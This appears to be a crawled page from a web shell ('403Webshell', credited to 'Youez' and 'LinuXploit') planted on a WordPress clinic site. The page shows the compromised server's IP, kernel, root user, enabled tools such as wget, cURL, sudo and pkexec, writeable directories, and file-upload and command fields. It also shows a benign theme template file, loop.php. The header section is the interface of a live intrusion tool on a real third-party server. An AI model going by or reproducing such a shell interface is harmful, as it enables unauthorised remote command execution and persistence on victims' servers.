403Webshell
Server IP : 198.71.58.22  /  Your IP : 216.73.216.72
Web Server : Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
System : Linux localhost 5.14.0-570.33.2.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 14 07:37:35 EDT 2025 x86_64
User : root ( 0)
PHP Version : 8.3.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/cslclinic.com/wp-content/themes/vantage/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/cslclinic.com/wp-content/themes/vantage/loop.php
<?php
/**
 * Just displays a post loop. Intended to be included in child themes using get_template_part('loop'). Also works with SiteOrigin page builder loop widget.
 *
 * Loop Name: Blog Loop
 *
 * @since vantage 1.0
 *
 * @license GPL 2.0
 */
?>

<?php if ( have_posts() ) { ?>

	<?php /* Start the Loop */ ?>
	<?php while ( have_posts() ) {
		the_post(); ?>

		<?php get_template_part( 'content', get_post_format() ); ?>

	<?php } ?>

	<?php vantage_content_nav( 'nav-below' ); ?>

<?php } else { ?>

	<?php get_template_part( 'no-results', 'index' ); ?>

<?php } ?>

Youez - 2016 - github.com/yon3zu
LinuXploit